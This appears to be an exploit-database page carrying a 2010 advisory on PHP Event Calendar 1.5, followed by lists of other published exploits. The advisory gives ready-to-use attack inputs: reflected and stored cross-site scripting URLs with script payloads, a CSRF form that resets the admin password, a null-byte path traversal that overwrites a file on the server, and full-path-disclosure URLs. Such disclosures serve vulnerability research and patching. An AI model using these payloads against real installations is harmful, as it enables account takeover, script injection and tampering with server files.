Menu

Search for hundreds of thousands of exploits

"PHP Event Calendar 1.5 - Multiple Vulnerabilities"

Author

Exploit author

cp77fk4r

Platform

Exploit platform

php

Release date

Exploit published date

2010-06-22

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
# Title: PHP Event Calendar <= v1.5 Multiple Vulnerabilities
# Author: cp77fk4r | Empty0pagE[SHIFT+2]gmail.com | www.DigitalWhisper.co.il
# Software Link: http://www.softcomplex.com/download.html
# Version: <= v1.5
# Tested on: Apache2+PHP5 on Win32
#
#
##[Cross Site Scripting]*
(Cross-Site Scripting attacks are a type of injection problem, in which
malicious scripts are injected into the otherwise benign and trusted web
sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web
application to send malicious code, generally in the form of a browser side
script, to a different end user. Flaws that allow these attacks to succeed
are quite widespread and occur anywhere a web application uses input from a
user in the output it generates without validating or encoding it (OWASP))
-Reflected:
http://[SERVER]/[DIR]/cl_files/index.php (POST/Login name)
http://
[SERVER]/[DIR]/cl_files/index.php?page=a&name=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://
[SERVER]/[DIR]/cl_files/index.php?CLd=21&CLm=06&CLy=2010&name=[CALENDAR_NAME]&type=list&action=t&page=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://
[SERVER]/[DIR]/cl_files/index.php?CLd=21&CLm=06&CLy=2010&name=[CALENDAR_NAME]&type=&action=e&err='%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C'
http://
[SERVER]/[DIR]/cl_files/index.php?CLd=23&CLm=06&CLy=2010%22%3E%3Cscript%3Ealert(1)%3C/script%3E&name=[CALENDAR_NAME]&type=&action=e
#
-Permenent:
http://[SERVER]/[DIR]/cl_files/index.php?page=e
(Title; Body; Background color; Background image; Align;)
#
##[Cross Site Request Forgery]*
(CSRF is an attack which forces an end user to execute unwanted actions on a
web application in which he/she is currently authenticated. With a little
help of social engineering (like sending a link via email/chat), an attacker
may force the users of a web application to execute actions of the
attacker's choosing. A successful CSRF exploit can compromise end user data
and operation in case of normal user. If the targeted end user is the
administrator account, this can compromise the entire web application.)
(OWASP))
#
http://[SERVER]/[DIR]/cl_files/index.php?page=a
#
Change "Admin" Password PoC:
<form name=user method=post action="http://
[SERVER]/[DIR]/cl_files/index.php?page=a&name=[CALENDAR_NAME]">
<input type="hidden" name="page" value="a">
<input type=hidden value="admin" name=l class=inpt>
<input type=hidden value="1234" name=p class=inpt>
<input type=hidden value="1234" name=p2 class=inpt>
</form>

#
##[Local File Rewriting+Path Traversal with NBP]**
(A Path Traversal attack aims to access files and directories that are
stored outside the web root folder. By browsing the application, the
attacker looks for absolute links to files stored on the web server. By
manipulating variables that reference files with dot-dot-slash (../)
sequences and its variations, it may be possible to access arbitrary files
and directories stored on file system, including application source code,
configuration and critical system files, limited by system operational
access control. The attacker uses ../ sequences to move up to root
directory, thus permitting navigation through the file system. (OWASP))
#
http://[SERVER]/[DIR]/cl_files/index.php
"Title:" \..\..\..\..\..\..\1.txt%00
#
Will rewrite %HOMEDRIVER%\1.txt file.
#
##[FULL PATH DICSLOSURE]
(Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the
path to the webroot/file. e.g.: /home/omg/htdocs/file/. Certain
vulnerabilities, such as using the load_file() (within a SQL Injection)
query to view the page source, require the attacker to have the full path to
the file they wish to view. (OWASP))
#
-Fatal error: Call to a member function read_file()/load_item() on a
non-object:
http://[SERVER]/[DIR]/cl_files/admin.php
http://[SERVER]/[DIR]/cl_files/auth.php
http://[SERVER]/[DIR]/cl_files/edit.php
http://[SERVER]/[DIR]/cl_files/templ.php
http://[SERVER]/[DIR]/cl_files/view.php
http://[SERVER]/[DIR]/cl_files/index.php?page=a&name=cP
http://[SERVER]/[DIR]/show.php
#
-Fatal error: Call to undefined function:
http://[SERVER]/[DIR]/cl_files/property.php
http://[SERVER]/[DIR]/cl_files/user.php
#
-Fatal error: Maximum execution time of 60 seconds exceeded:
http://[SERVER]/[DIR]/?CLm[CALENDAR_NAME]=1333333337
#
-Parse error: syntax error:
http://[SERVER]/[DIR]/cl_files/data/groups.php
http://[SERVER]/[DIR]/cl_files/data/users.php
#
##[Directory Listing]
#
http://[SERVER]/[DIR]/cl_files/data/
#
*The victim must be logged in.
**The attacker must be logged in.
# [e0f]
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-12-02 "WordPress Plugin Wp-FileManager 6.8 - RCE" webapps php "Mansoor R"
2020-12-02 "WonderCMS 3.1.3 - Authenticated Remote Code Execution" webapps php zetc0de
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" webapps php "Mufaddal Masalawala"
2020-12-02 "Simple College Website 1.0 - 'page' Local File Inclusion" webapps php Mosaaed
2020-12-02 "Car Rental Management System 1.0 - SQL Injection / Local File include" webapps php Mosaaed
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" webapps php zetc0de
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
2020-12-01 "Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS" webapps php yunaranyancat
Release Date Title Type Platform Author
2010-06-22 "PHP Event Calendar 1.5 - Multiple Vulnerabilities" webapps php cp77fk4r
2010-06-22 "SoftComplex PHP Event Calendar 1.5 - Multiple Remote Vulnerabilities" webapps php cp77fk4r
2010-06-13 "PHPplanner PHP Planner 0.4 - Multiple Vulnerabilities" webapps php cp77fk4r
2010-05-30 "Nginx 0.6.36 - Directory Traversal" remote multiple cp77fk4r
2010-05-18 "phpMyAdmin 2.6.3-pl1 - Cross-Site Scripting / Full Path" webapps php cp77fk4r
2010-04-13 "Blog System 1.5 - Multiple Vulnerabilities" webapps php cp77fk4r
2010-04-12 "Blog System 1.x - Multiple Input Validation Vulnerabilities" webapps php cp77fk4r
2010-04-08 "Tiny Java Web Server 1.71 - Multiple Input Validation Vulnerabilities" remote multiple cp77fk4r
2010-04-08 "miniature java Web server 1.71 - Multiple Vulnerabilities" remote multiple cp77fk4r
2010-04-03 "Java Mini Web Server 1.0 - Directory Traversal / Cross-Site Scripting" remote multiple cp77fk4r
2010-04-03 "SafeSHOP 1.5.6 - Cross-Site Scripting / Multiple Cross-Site Request Forgery Vulnerabilities" webapps asp cp77fk4r
2010-03-27 "Uebimiau Webmail 2.7.2 - Multiple Vulnerabilities" webapps php cp77fk4r
2010-02-11 "PHP Captcha Security Images - Denial of Service" dos php cp77fk4r
2010-02-09 "MOJO's IWms 7 - SQL Injection / Cross-Site Scripting" webapps asp cp77fk4r
2010-02-06 "ShopEx Single 4.5.1 - Multiple Vulnerabilities" webapps php cp77fk4r
2010-02-06 "ShopEx Single 4.5.1 - 'errinfo' Cross-Site Scripting" webapps java cp77fk4r
2010-01-24 "SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection" webapps php cp77fk4r
2010-01-21 "SHOUTcast Server 1.9.8/Win32 - Cross-Site Request Forgery" webapps windows cp77fk4r
2009-12-25 "cms -db 0.7.13 - Multiple Vulnerabilities" webapps php cp77fk4r
2009-12-22 "DeluxeBB 1.3 - Multiple Vulnerabilities" webapps php cp77fk4r
2009-12-21 "social Web CMS Beta 2 - Multiple Vulnerabilities" webapps php cp77fk4r
2007-12-17 "MOJO IWms 7 - 'default.asp' Cookie Manipulation" webapps asp cp77fk4r 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected